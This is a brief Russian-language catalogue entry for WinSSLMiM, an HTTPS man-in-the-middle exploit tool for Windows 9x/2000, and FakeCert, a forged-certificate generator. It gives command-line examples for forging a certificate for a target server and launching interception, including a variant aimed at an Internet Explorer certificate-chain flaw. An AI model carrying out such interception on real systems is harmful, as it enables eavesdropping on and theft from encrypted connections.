WinSSLMiM - эксплоит, реализующий нападение HTTPS
"Man in the Middle". Программа содержит FakeCert,
утилиту для создания поддельных
сертификатов (как DCA of sslmim). Код может,
например, эксплуатировать уязвимость
Certificate Chain в Internet Explorer. Работает только под
Windows 9x/2000. Пример использования:
FakeCert : fc -h
WinSSLMiM : wsm -h
Пример 1:
Generate fake certificate: fc -s www.serverHTTPS.com
-f fake_cert.crt
Launch WinSSLMiM: wsm -f fake_cert.crt
Пример 2 (уязвимость IE):
Generate fake certificate : fc -s www.serverHTTPS.com
-f fake_cert.crt -t trust.crt
Launch WinSSLMiM: wsm -f fake_cert.crt -t trust.crt
Ссылки:
